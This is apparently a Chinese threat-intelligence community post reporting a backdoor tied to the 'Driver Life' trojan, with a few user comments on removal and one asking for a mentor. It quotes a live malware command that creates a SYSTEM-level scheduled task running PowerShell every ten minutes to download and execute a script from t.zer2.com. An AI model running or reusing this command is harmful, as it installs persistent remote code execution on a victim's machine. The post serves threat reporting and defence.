远控服务器 后门连接
访问恶意域名,创建定时任务
匿名用户 2019-09-27 15:37:04 1272人浏览

schtasks /create /ru system /sc MINUTE /mo 10 /tn Rtsa /tr "powershell -nop -ep bypass -c 'IEX(New-Object System.Net.WebClient).DownloadString(\\\"http://t.zer2.com/ipco.jsp?h\\\")'" /F

域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
xiqing_ao 2019-10-29 16:16:55 回复
t.zer2.com,驱动人生类别的木马,找到木马文件,删除定时任务没用的
luolin6888 2019-09-30 23:14:01 回复
不懂 有没有师傅收徒啊 想学安全
匿名用户 2019-09-29 10:34:22 回复
驱动人生